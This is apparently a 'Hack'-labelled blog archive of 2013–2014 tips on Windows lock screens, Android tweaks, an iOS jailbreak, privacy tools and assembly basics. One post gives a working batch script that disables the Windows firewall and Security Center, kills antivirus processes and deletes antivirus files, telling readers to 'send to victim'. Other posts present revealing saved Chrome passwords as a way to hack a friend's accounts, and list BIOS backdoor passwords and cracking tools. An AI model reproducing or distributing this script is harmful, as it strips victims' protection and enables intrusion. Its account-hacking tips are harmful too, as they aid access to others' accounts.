Showing posts with label Hack. Show all posts
Showing posts with label Hack. Show all posts

Friday, 25 April 2014

How to Customize the Lock Screen on Windows 8


Windows 8’s lock screen is very at home on a tablet, but it can also be used on laptops and desktops.  The lock screen is not just a background image – it contains widgets that display quick notifications.

These widgets, known as lock screen apps, allow you to view information – such as new emails, weather, calendar appointments, instant messages or social updates – without even unlocking your PC.

Note: Windows 8.1 works roughly the same way. The screenshots will look slightly different, but it’s nearly the same thing.

Disable the Lock Screen
If you do not like the lock screen, you do not have to use it.  Unfortunately, Microsoft has buried the “disable lock screen” option. Luckily, disabling it is simple:

How to Disable the Lock Screen Using the Registry – This process works on all editions of Windows 8.  We’ve even provided a .reg file you can easily download and double-click to make this change.
How to Disable the Lock Screen Using Group Policy –  If you have the Professional edition of Windows 8, you can use the group policy editor to disable the lock screen.
Once you’ve made this change, Windows will always display the password prompt, saving you a key-press during the login process.


Select a Lock Screen Background
Lock screen settings are located in the PC setting application on Windows 8.  To access it, open the Settings charm (press Windows Key + I to quickly open the Settings charm from anywhere in Windows) and select Change PC settings.

Select the Personalize category and select Lock screen.  Click (or tap) one of the provided background images or use the Browse button and select any image from your computer, Bing, SkyDrive, or even your camera.

If you want more features, try using the Chameleon app located in the Windows Store.  It can watch “photo of the day”-type services and automatically change your lock screen background on a schedule, a feature not included with Windows 8.


Configure Lock Screen Apps
Lock screen widgets – known as “lock screen apps” in Windows 8 – allow you to view information at a glance.  Apps added to the lock screen are allowed to run in the background when your PC is locked so they can fetch new, updated information and display it on the lock screen.

You can configure the list of lock screen apps from the Lock screen apps section below the lock screen background chooser.  Click (or tap) an icon and select the app you want in that location.  You can get more widgets by installing more Windows Store apps – apps can choose to include lock screen integration.  If you do not want any lock screen apps – or just want a few – you can select the Don’t show quick status here option.

You can also choose an app to show a more detailed status.  For example, when you choose to display a detailed weather status, you will see the weather displayed in text on your lock screen.

That’s it for customizing the lock screen – it’s all about background images and lock screen apps.  However, with custom backgrounds and apps, each person’s lock screen could look different.


How to Set a Custom Logon Screen Background on Windows 7

Windows 7 makes it possible to change the welcome screen that appears when you start your computer without any third-party software, but this setting is well hidden. You can set any image you like as your background.


If you are using Windows 8 and want to accomplish the same thing, we’ve got you covered with a tutorial on changing the lock screen in Windows 8.

This setting is intended for original equipment manufacturers (OEMs) to customize their systems, but there’s nothing stopping you from using it yourself. All you have to do is change a single registry value and put an image file in the correct location.


Enabling Custom Backgrounds
This feature is disabled by default, so you’ll have to enable it from the Registry Editor. You can also use the Group Policy Editor if you have a Professional version of Windows – scroll down a bit for the Group Policy Editor method.

Launch the Registry Editor by typing regedit into the search box in the Start menu and pressing Enter.

In the Registry Editor, navigate to the following key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background


You’ll see an DWORD value named OEMBackground. If you don’t see it, right-click in the right pane, point to the New submenu and create a new DWORD value with this name.

Double-click the OEMBackground value and set its value to 1.

Note that selecting a new theme in the Appearance and Personalization window will “unset” this registry value. Selecting a theme will change the value of the key to the value stored in the theme’s .ini file, which is probably 0 – if you change your theme, you’ll have to perform this registry tweak again.


Changing the setting in group policy will allow it to persist even when you change your theme, but the Group Policy Editor is only available in Professional editions of Windows.

If you have access to the Group Policy Editor, launch gpedit.msc from the Start menu.

Navigate to the following section in the Group Policy Editor window:

Computer Configuration\Administrative Templates\System\Logon

You’ll find a setting named “Always use custom login background.” Double-click it and set it to Enabled.

Setting An Image
Your image file must be less than 256 KB in size. It’s also a good idea to use an image file that matches the resolution of your monitor, so it won’t look stretched.

Windows looks for the custom logon screen background image in the following directory:

C:\Windows\System32\oobe\info\backgrounds

By default, the info and backgrounds folders don’t exist. Navigate to the C:\Windows\System32\oobe folder and create them yourself by right-clicking inside the folder, pointing to New, and selecting New Folder.

Copy your desired background image to the backgrounds folder and name it backgroundDefault.jpg.

The change will take effect immediately – no system reboot required. The first time you log out or lock your screen (try the WinKey-L keyboard shortcut), you’ll see your new background.

Third-Party Tools
You don’t have to do this by hand. There are a variety of third-party tools that automate this process for you, like Windows Logon Background Changer, which we’ve covered in the past. Windows Logon Background Changer and other utilities just change this registry value and put the image file in the correct location for you.


To get the default logon screen back, just delete the backgroundDefault.jpg file. Windows will use the default background if no custom background image is available.





Wednesday, 23 April 2014

Use Multiple WhatsApp Accounts on your Android Device


We know that WhatsApp is the most widely used messaging service between the mobiles. Moreover it also allows users to share images, videos, music files etc. Even the latest version of Android also supports audio messaging. Right now there are more than 200 million active users on WhatsApp which carries more than 20 billion messages across the globe. Despite having other messaging available chat, users prefer WhatsApp over the other one due to its simplicity and instant messaging service.

But you might have faced the problem that you cannot use more than one WhatsApp accounts on mobile. Dual SIM users always wish to use two different accounts on their mobile. Earlier it was very difficult but now it is possible with the help of SwitchMe multiple accounts App. Even single SIM users can use this app to use multiple accounts.


Disclaimer
Incorrect use of SwitchMe multiple user account application can potentially harm your device. It is recommended that you should take nandroid backup of device so that it can be restored if anything goes wrong. Follow this article to take a nandroid backup. Read the article completely before implementing it.


Pre-requisites
The most important thing is you must have rooted your device (mobile/tablet). Without root access you cannot use SwitchMe app.
Most of the devices are compatible as long as they have enough free internal memory. For low specification device it might work slowly than the others.
SwitchMe multiple account app.
Whatsapp for your device. (Of course)
Before moving to the procedure let’s know how SwitchMe multiple account works.

SwitchMe multiple user account


Just like we have multiple user accounts, we do have same thing for Android. For that we need SwitchMe multiple user account app. SwitchMe allows you to log in and out of multiple user spaces just as you would on a desktop computer, with each account having its own system settings, apps and data. But a root access is must for it.

By using this app you can create multiple accounts like one for battery saving which contains essential apps only or one for high performance. Each account will have its own settings, applications and data. The data from the other profile is not accessible to current profile.

The free version of SwitchMe allows only 2 accounts without any security feature. For multiple accounts, you need to spend few bucks to get SwtichMe multiple accounts key. Let’s see how to use multiple Whatsapp accounts on your mobile.

How to use multiple WhatsApp accounts on Android device


First download and install SwitchMe multiple account app from play store.
Click here to download.
Open this app. It will ask for Superuser request. Make it grant (You won’t get this message if you have default access grant).
Now create profile a user profile with your name. This profile is an administrator account which contains all the current apps and settings. If you are currently using WhatsApp, it will be present here in this profile.
Create another profile in SwitchMe with some other name. Select this account and choose Switch option written below.


Your device will be rebooted automatically (It will take few minutes for booting).
If you are booting for the first time, you’ll need to follow all the steps like select language etc. (the steps that you did for first time after the purchase of a phone).
Here you will not see any app that you have installed in primary account.
Now install Whatsapp again and register it for different SIM. (Remember only one WhatsApp account can be registered per number).
If SIM you are registering for WhatsApp is not present in your mobile, then message verification will fail at the time of registration.
Don’t worry. Select Call Me option. You will get a call on that number. Hear verification code on call and note it down. Now enter it in Whatsapp. With this you will successfully register WhatsApp.
That’s it! Now you can use multiple WhatsApp accounts on your Android device. Only thing you have to do is switch the user profile whenever you want you use other account. If you have any problems regarding procedure, do not hesitate to ask us. We are always there to help you.




Change bootanimation on any phone

Ever stumbled upon a cool boot animation on a friend’s Android device or a presentation on the Web? It isn’t hard to make your own. In fact, we are going to show you in this post, two ways to create a custom boot animation for your own device.


To use this method, you will need a file manager app with Root access. In this quicktip, we will be using the Root Browser app.

1. Download a custom boot animation you want to use by choosing the animation you want to use and downloading the associated bootanimation.zip file. (Here is another place to find custom animations to use.)

2. Open Root Browser (or your file manager) app and once inside, locate your original boot animation file (bootanimation.zip) in /system/media.

3. Long-press the file, choose Rename and name it to bootanimation.zip1.


4. Next, browse to the custom boot animation that you want to switch to, copy the zip file to /system/media. Long-press, choose Permission.

5. Tick the boxes as shown in the screenshot below, and press OK. After that, rename the file to bootanimation.zip, if the zip file name is different.

Note: You have to make sure that the file name is correct (bootanimation.zip) for the system to recognize your boot animation, and boot properly.


6. Now you should be able to see two zip files, one, bootanimation.zip (new file) and the other is bootanimation.zip1 (original).

Note: If you ever want to switch back to your original boot animation, delete the current bootanimation.zip and rename the original file back to bootanimation.zip (from bootanimation.zip1).

7. Reboot the device and you will be able to see your new custom boot animation!


Thursday, 16 January 2014

iOS 7 Jailbreak Has Released For iPhone, iPad, iPod Devices




 iOS 7 Jailbreak Has Released For Your iPhone, iPad, iPod Devices. Evad3rs team has released jailbreak for iOS 7 devices just after 3 months of iOS 7  released. 

What is Jailbreak : iOS jailbreaking is the process of removing the limitations on Apple Inc. devices running the iOS operating system through the use of software and hardware exploits; such devices include the iPhone, iPod touch, iPad, and second-generation Apple TV. Jailbreaking permits root access to the iOS operating system, allowing the download of additional applications, extensions, and themes that are unavailable through the official Apple App Store.

Requirements
1. Take Manual backup of your iPhone before using evasi0n tool for jailbreak.
2. A computer, running Windows (XP minimum), Mac OS X (10.6 minimum) or Linux (x86 / x86_64).
3. iTunes installed if you're running Windows.
4. An iPhone, iPad or iPod running iOS 7.0 through 7.0.4.
5. A USB cable to connect the device to the computer.
6. Disable the lock passcode of your iOS device before using evasi0n. It can cause issue.




How To Jailbreak iOS 7 on Windows & Mac with Evasi0n7:
Step 1: Download iOS 7 Jailbreak tool, Evasi0n for your Windows or Mac PC / Laptop
Step 2: Unzip / Load .dmg file to access evasi0n7.
Step 3: Connect your device with USB cable to your computer, and wait for few seconds, so, Evasi0n7 detects it.
Step 4: Once connected with Evasi0n7, simply press the Jailbreak button.
Step 5: The on-screen Evasi0n7 details will lead you to the next step, where it requires you to click the Evasi0n icon from your iPhone / iPad / iPod Touch.



After jailbreak iPhone will reboot with Cydia.


Download For Windows

Sunday, 12 January 2014

NSA Spying on you ?? Read below on on ways to stop the NSA spying on you !!




1. Browse anonymously with TOR

NSA whistleblower Edward #Snowden has been photographed with a Tor sticker on his laptop. Tor lets you use the Internet without revealing your IP address or other identifying information. The distributed network works by bouncing your traffic among several randomly selected proxy computers before sending it on to its real destination. Web sites will think you’re coming from whichever node your traffic happens to bounce off of last, which might be on the other side of the world.

Tor is easy to use. You can download the Tor Browser Bundle, a version of the Firefox browser that automatically connects to the Tor network for anonymous web browsing.

2. Keep your chats private with OTR

If you use a conventional instant messaging service like those offered by Google, AOL, Yahoo or Microsoft, logs of your chats may be accessible to the NSA through the PRISM program. But a chat extension called OTR (for “off the record”) offers “end-to-end” encryption. The server only sees the encrypted version of your conversations, thwarting eavesdropping.

To use OTR, both you and the person you’re chatting with need to use instant messaging software that supports it. I use Pidgin, which works with Google, AOL, Microsoft and Yahoo’s chat networks, among others. #Linux users can also use Pidgin. OTR works as an extension to conventional instant messaging networks, seamlessly adding privacy to the IM networks you already use. You can configure Pidgin so that if a person you’re chatting with is also running an OTR-capable client, it will automatically encrypt the conversation.

3. Make secure calls with Silent Circle

The conventional telephone network is vulnerable to government wiretapping. And many Internet-based telephony applications, including #Skype, are thought to be vulnerable to interception as well.

But an Internet telephony application called Silent Circle is believed to be impervious to wiretapping, even by the NSA. Like OTR, it offers “end-to-end” encryption, meaning that the company running the service never has access to your unencrypted calls and can’t turn them over to the feds. The client software is open source, and Chris Soghoian, the chief technologist of the American Civil Liberties Union, says it has been independently audited to ensure that it doesn’t contain any “back doors.”

4. Remove your cellphone battery to stop being Tracked

The NSA phone records program revealed by the Guardian last week not only collects information about what phone numbers we call, it also collects data about the location of the nearest cellphone tower when we make calls. That gives the NSA the ability to determine your location every time you make a phone call — and maybe in between calls too.

Unfortunately, Soghoian says there’s no technical fix for this kind of surveillance. “The laws of physics will not let you hide your location from the phone company,” he says. The phone company needs to know where you are in order to reach you when you receive a phone call.

So if you don’t want the NSA to know where you’ve been, you only have one option: You need to turn off your cell phone. Or if you’re feeling extra paranoid, take out the battery or leave your phone at home.

Wednesday, 25 December 2013

How to view saved password in google chrome ?

In this post i will show you a simple but very powerfull trick to view or hack saved password in google chrome. It does not matter for which website the password is saved it will work on all of them. It will work on Facebook, Gmail, Yahoo, twitter and many more. If you get your hands on your friend computer you can hack their password with this simple little trick. It does not require any software or addons to be installed on your computer. Lets get started. How to do that ? 1. Open any website where password is saved by user. Here i will demonstrate with facebook but it will work on any website. 2. Right click on password(Dots or asterisks) as shown in below image. 3.Then click onInspect element. 4.Then changePassword to textas shown in below picture. Before changing it will look like below: After changing it will look like below: 5. Done now asterisk or dots will changed to text.

Monday, 9 December 2013

How To Create Undeletable And Unrenamable Folders ?


Go to Start and then Click on Run
Type cmd & hit enter (To open Command Prompt ).
Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
Type D: or E: and hit enter 
Type md con\ and hit enter (md - make directory)
You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
Open that directory, you will see the folder created of name con.
Try to delete that folder or rename that folder windows will show the error message.

How to delete that folder ?

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.
Open Command Prompt
Type D: ( if u created this type of folder in D: drive) & hit enter
Type rd con\ (rd - remove directory)
Open that directory and the folder will not appear because it is removed.

Tuesday, 3 December 2013

How to Hide the File and Folder In Linux?


Follow The Steps To Hide Folder In Linux :-


1) Open the folder which you want to hide.
2) Create a simple Document file (Right click - > Create Document file ->Empty File).
3) Rename the file as .hidden and save...

4) Open .hidden File then just Write your file or folder name which you want to hide. 

5) Then save again and close the file.
6) Press ctrl+H to Hide that file or folder.
7) Again press ctrl+H to Show that hidden File or folder.


That is the easy way to hide File or Folder in Linux...
TRICK - 2

1) Just Rename the file or folder as prefix(first character) the name  '.'(dot)
    It means  Starting with '.' or postfix(last character) the name '~'.
    It means Ending with '~' and press the ctrl+H to 
2) Then again press ctrl+H to show the file.

Sunday, 1 December 2013

How to delete viruses permanently from ur PC


How to delete viruses permanently from ur PC...if it is coming back again and again after deleting.......

Open the “Command Prompt” from “Start” menu or by shortcut key “Windows Logo + R”.
Type cmd in “Command Prompt” and hit Enter to open “Command Prompt” window.
Type the following command in Command Prompt to delte files
DEL /F /Q /A filename
here filename is the full address of your file e.g C:/Program Files/ABC/abc.txt
Here DEL is to delete the file specified, /F is the tag which helps in deleting the file forcefully, /Q is for quiet mode, so it won’t let the system to ask for your confirmation before deleting, /A tag help in deleting files with attributes like hidden files or so.

To delete the whole folder use following command
RD /S /Q folder path
here folder path is the full path to the folder you want to delete e.g C:/Program Files/ABC
Here RD is for Remove Directory, /S for removing all the sub-folders and files present in that folder, /Q for quiet mode that it will not ask for your confirmation before deleting

You can use the same method to remove any file or folder, but this method provides great help in deleting infected files in folders.

Saturday, 30 November 2013

How to Bypass BIOS Passwords Easy Trick

Warning: This post is intended for systems administrators & IT Professionals provided service computer hardware. It is only for educational purpose not for Hackers, Home users or code crackers. Plz do not try this if you aren’t familiar with Computer’s Hardware.. Cooltrickss is not responsible for any illegal act or misuse of this information on How to Bypass BIOS Passwords.


How to Bypass BIOS Passwords
There are Back-door’s and several tricks through which it can Bypass or reset BIOS Passwords. BIOS passwords adds additional security for PC’s & laptops. Basic purpose is to prevent user to change BIOS settings & Booting without password. Before you Start you must contact customer support of hardwaremanufacturer staff and take the guidance of methods of bypassing the BIOS security. There are various methods that you can use it by yourself to bypass or reset the BIOS password That includes :

.
Use password cracking software like Hydra
Using a manufacturers backdoor password to access BIOS
Removing the CMOS battery for several minutes i.e 10min
Reset CMOS using the jumpers.
To get professional service
Overloading the keyboard buffer

Must remember that most BIOS passwords ain’t protect hard drive so if you wanna recovery first config it as a slave drive in same system or remove hard drive & then install it in identical system on How to Bypass BIOS Passwords.
______________________________________________________________
Backdoor passwords
Many BIOS manufacturers provided backdoor passwords that can access BIOS setup. These pass arecase sensitive so various combination must be tried. Keep in Mind that in US Key letter ” _ ” corresponds to ” ? ” in European keyboards. Laptop’s have better BIOS security then PC’s but we are not  concerned with it Hon ow to Bypass BIOS Passwords.

WARNING: Some BIOS configs might LOCK out your system completely if 3 times incorrect password entered.
______________________________________________________________
Award BIOS backdoor passwords:
AWARD_SW   AWARD?SW   AWARD   SW   AWARD   PW
ALFAROME   ALLy   aLLy   aLLY   ALLY   aPAf _award
Condo   d8on   djonet   HLT   J64 J256 J262 j332 j322   KDD
AWKWARD   awkward   BIOSTAR   CONCAT   CONDO
syxz   shift   + syxz   TTPTHA   ZAAADA   ZBAAACA   ZJAAADC
Lkwpeter   LKWPETER   PINT   pint   SER   SKY_FOX   SYXZ
01322222   589589   589721   595595   598598

______________________________________________________________
AMI BIOS backdoor passwords:
AMI   AAAMMMIII   LKWPETER   A.M.I.   CONDO
RAND   AMI?SW   AMI_SW   PASSWORD   HEWITT

______________________________________________________________
PHOENIX BIOS backdoor passwords:
phoenix,   PHOENIX,   LKWPETER   lkwpeter

ALFAROME   BIOSTAR   biostar   biosstar   CMOS  
cmos MISC.   SETUP   Syxz   Wodj
CMOS,   BIOS   setup  COMMON PASSWORDS

______________________________________________________________
OTHER BIOS PASSWORDS BY MANUFACTURER
Manufacturer Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Siemens SKY_FOX
TMC BIGO
Toshiba Toshiba

Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
 
Toshiba laptops will bypass the BIOS passwords if left shift key is pressed during boot.


______________________________________________________________
Password cracking software
This software is used to Crack BIOS or reset on many chipsets. If PC has BIOS admin password this won’t allow floppy Drive so these utilities will not work.Though these utilities haven’t came from manufacturers so use them at your own risk How to Bypass BIOS Passwords.
Download:   Cmos password recovery tools 3.1
RemPass
KILLCMOS
______________________________________________________________
Using the Motherboard “Clear CMOS” Jumper or Dipswitch settings
Many System’s motherboards featured a set of dip-switches & jumpers that clears CMOS and remove its custom settings including BIOS passwords. Location of jumpers / dip-switches may vary according to manufacturer so do check documentation of motherboard.If documentation is not available mostly jumpers/dip-switches they are found on edge of the motherboard. while in laptops dip-switches are found under the keyboard.
jumpers/dip-switches  are often labeled as  – CLEAR CMOS – CLR – CLRPWD – CLEAR – PWD  PASSWD – PASSWORD 

NOTE: Unplug your PC and use grounding strip before touching motherboard. Once jumpers located on your PC turn on  and check if password is cleared or not, If it has then turn on and return jumpers to there original position on How to Bypass BIOS Passwords.
______________________________________________________________
Removing the CMOS Battery
On Most of the Systems CMOS settings are buffered by small battery linked to motherboard (just like small watch battery). If you power-of PC and unplug battery CMOS will reset itself and password will be blank. Before you do this you should be familiar with the manually reconfiguring the BIOS settings.
By using Capacitor Back-up power is also provided by some manufacturers to CMOS Chipsets, so if first attempt fails leave the battery out for approx 24 hours. Some Batteries are just wired on motherboard while some are soldered on it this makes the task much difficult. Experienced person must unsolder by properly placing sucker because it may damage motherboard. How to Bypass BIOS Passwords Another option is to  remove complete CMOS chip from motherboard for some time.
NOTE: Removing of battery to reset CMOS won’t work for every system. Latest laptops with stored BIOS passwords ain’t require computer power so removing the CMOS battery will not work for them. 
______________________________________________________________
Overloading the KeyBoard Buffer
On Older Computers CMOS can be forced to enter in setup screen on Booting by overloading thekeyboard buffer. This technique can be done by booting the system but keyboard or mouse must be unattached. In some systems it can also be done by pressing ESC key over 100′s of times rapidly.
.
______________________________________________________________

Jumping the Solder Beads on the CMOS
There is also possibility to reset CMOS by connecting Jumpers on chipset. There are number of chipsets soindividual jumper for every single chipset. Location of Solder Beeds may vary according to manufacturer so do check documentation of motherboard. How to Bypass BIOS Passwords This technique is mosttoughest and inexperienced users aren‘t recommended. This trick should only be used as “last ditch”effort.
.
______________________________________________________________
Using a professional service
If the manufacturer of PC or Laptop isn’t resetting BIOS password then there is still option of using professional service. Password Crackers. Inc provides a variety of services for laptops and PC’s ranging between $100 – $400. But for this service you have to provide proof of ownership or membership. This will not help 2nd hand PC buyers 

Thursday, 28 November 2013

How To Disable Victim Antivirus


 Leave your thoughts
Open Notepad Copy it and Paste To Notepad



@ echo off
rem –
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem –

Now Save this code as .bat and send to victim

Sunday, 20 October 2013

Introduction to Assembly Language And How Its work.

Introduction to Assembly Language
Hello friends, lets continue our tutorial on reverse engineering. Today i will teach you assembly language basic that are necessary for learning reverse engineering. As we all know assembly language is very important for reverse engineering and we must know, what are registers and which register serves for what. How the assembly language instruction work and how can we relate them with normal high language coding( C, JAVA, VB, etc.)  to hack any software.

What is Assembly language?
Assembly language is a low level or simply called machine language made up of machine instructions. Assembly language is specific to processor architecture example different for x86 architecture than for SPARC architecture. Assembly language consist of assembly instructions and CPU registers.assembly language is too big topic… I think i have to tell only what you need for reverse engineering.. So i start from CPU registers.

CPU registers – Brief Introduction:
First of all what are registers? Most of Computer Engineering and Electronics Engineering guys knows about them but for others, Registers are small segments of memory inside CPU that are used for storing temporary data. Some registers have specific functions, others are just use for some general data storage. I am considering that you all are using x86 machines. There are two types of processors 32 bit and 64 bit processors. In a 32 bit processor, each register can hold 32 bits of data. On the other hand 64 bit register can hold 64 bit data. I am explaining this tutorial considering that we are using 32 bit processors. I will explain the same for 64 bits in later classes on hackguide4u and hackingloops.
There are several registers but for Reverse engineering  general purpose registers. We are interested in only 9 General purpose registers namely:
EAX
EBX
ECX
EDX
ESI
EDI
ESP
EBP
EIP
All these registers serves for different purposes. So I will start explaining all of them one by one for a more clear and accurate understanding of register concepts. I am putting more strain on these because these registers are called heart of reverse engineering.
EAX register is accumulator register which is used to store results of calculations. If any function returns a value its stored into EAX register. We can access EAX register using functions to retrieve the value of EAX register.
Note: EAX register can also be used for holding normal values regardless of calculations too.

The EDX is the data register. It’s basically an extension of EAX to assist it in storing extra data for complex operations. It can also be used for general purpose data storage.
The ECX, also called the count register, is used for looping operations. The repeated operations could be storing a string or counting numbers.
The ESI and EDI relied upon by loops that process data. The ESI register is the source index for data operation and holds the location of the input data stream. The EDI points to the location where the result of data operation is stored, or the destination index.
ESP is the stack pointer, and EBP is the base pointer. These registers are used for managing function calls and stack operations. When a function is called, the function’s arguments are pushed on the stack and are followed by a return address. The ESP register points to the very top of the stack, so it will point to the return address. EBP is used to point to the bottom of the call stack.
EBX is the only register that was not designed for anything specific. It can be used for extra storage.
EIP is the register that points to the current instruction being executed. As the CPU moves through the binary executing code, EIP is updated to reflect the location where the execution is occurring.
The ‘E’ at the beginning of each register name stands for Extended. When a register is referred to by its extended name, it indicates that all 32 bits of the register are being addressed.  An interesting thing about registers is that they can be broken down into smaller subsets of themselves; the first sixteen bits of each register can be referenced by simply removing the ‘E’ from the name. For example, if you wanted to only manipulate the first sixteen bits of the EAX register, you would refer to it as the AX register. Additionally, registers AX through DX can be further broken down into two eight bit parts. So, if you wanted to manipulate only the first eight bits (bits 0-7) of the AX register, you would refer to the register as AL; if you wanted to manipulate the last eight bits (bits 8-15) of the AX register, you would refer to the register as AH (‘L’ standing for Low and ‘H’ standing for High).

Introduction to Memory and Stacks:
There are three main sections of memory:
1. Stack Section – Where the stack is located, stores local variables and function arguments.
2. Data Section – Where the heap is located, stores static and dynamic variables.
3. Code Section – Where the actual program instructions are located.
The stack section starts at the high memory addresses and grows downwards, towards the lower memory addresses; conversely, the data section (heap) starts at the lower memory addresses and grows upwards, towards the high memory addresses. Therefore, the stack and the heap grow towards each other as more variables are placed in each of those sections. I have shown that in below Figure..
High Memory Addresses (0xFFFFFFFF)
———————- <—–Bottom of the stack
|                          |
|                          |   |
|         Stack        |   | Stack grows down
|                          |   v
|                          |
|———————| <—-Top of the stack (ESP points here)
|                          |
|                          |
|                          |
|                          |
|                          |
|———————|  <—-Top of the heap
|                          |
|                          |    ^
|       Heap          |     |   Heap grows up
|                          |    |
|                          |
|———————| <—–Bottom of the heap
|                          |
|    Instructions    |
|                          |
|                          |
———————–
Low Memory Addresses (0×00000000)
Some Essential Assembly Instructions for Reverse Engineering:
Instruction
Example
Description
push
push eax
Pushes the value stored in EAX onto the stack
pop
pop eax
Pops a value off of the stack and stores it in EAX
call
call 0x08abcdef
Calls a function located at 0x08abcdef
mov
mov eax,0×5
Moves the value of 5 into the EAX register
sub
sub eax,0×4
Subtracts 4 from the value in the EAX register
add
add eax,0×1
Adds 1 to the value in the EAX register
inc
inc eax
Increases the value stored in EAX by one
dec
dec eax
Decreases the value stored in EAX by one
cmp
cmp eax,edx
Compare values in EAX and EDX; if equal set the zero flag* to 1
test
test eax,edx
Performs an AND operation on the values in EAX and EDX; if the result is zero, sets the zero flag to 1
jmp
jmp 0x08abcde
Jump to the instruction located at 0x08abcde
jnz
jnz 0x08ffff01
Jump if the zero flag is set to 1
jne
jne 0x08ffff01
Jump to 0x08ffff01 if a comparison is not equal
and
and eax,ebx
Performs a bit wise AND operation on the values stored in EAX and EBX; the result is saved in EAX
or
or eax,ebx
Performs a bit wise OR operation on the values stored in EAX and EBX; the result is saved in EAX
xor
xor eax,eax
Performs a bit wise XOR operation on the values stored in EAX and EBX; the result is saved in EAX
leave
leave
Remove data from the stack before returning
ret
ret
Return to a parent function
nop
nop
No operation (a ‘do nothing’ instruction)
*The zero flag (ZF) is a 1 bit indicator which records the result of a cmp or test instruction
Each instruction performs one specific task, and can deal directly with registers, memory addresses, and the contents thereof. It is easiest to understand exactly what these functions are used for when seen in the context of a simple hello world program and try to relate assembly language with high level language such as C language.
Here is simple C program that displays Hello World:
int main(int argc, char *argv[])                    {                     printf(“Hello World!\n”);                 return 0;           }

Save this program as helloworld.c and compile it with ‘gcc -o helloworld helloworld.c’; run the resulting binary and it should print “Hello World!” on the screen and exit. Ahhah… It looks quite simple. Now let’s look how it will look in assembly language.

0x8048384     push ebp                      <— Save the EBP value on the stack
0x8048385     mov ebp,esp               
<— Create a new EBP value for this function
0×8048387     sub esp,0x8                 
<—Allocate 8 bytes on the stack for local variables
0x804838a     and esp,0xfffffff0          
<—Clear the last byte of the ESP register
0x804838d     mov eax,0x0                 
<—Place a zero in the EAX register
0x8048392     sub esp,eax                  
<—Subtract EAX (0) from the value in ESP
0x8048394     mov DWORD PTR [esp],0x80484c4     
<—Place our argument for the printf() (at address 0×08048384) onto the stack
0x804839b     call 0x80482b0 <_init+56>                     
<—Call printf()
0x80483a0     mov eax,0x0                 
<—Put our return value (0) into EAX
0x80483a5     leave                              
<—Clean up the local variables and restore the EBP value
0x80483a6     ret                                  
<—Pop the saved EIP value back into the EIP register
As you can easily figure out these instructions are similar to that of C program. You can easily note that flow of program is same. Off course it will be same as its a assembly code of same binary (exe) obtained from executing above C program.

I hope you all like it. We will continue our discussion tomorrow where i will explain how to analyze assembly language codes for those binaries whose high level source code we don’t have.
A quick tip for all users how to learn assembly language better…  Pick a already made code and generate its binary or exe file and now obtains the assembly code of that binary and try to relate assembly code with high language code. I guarantee that will surely help you to understand better as I always used to do understand things like these ways only.

 

Copyright @ 2013 H@cking Tricks.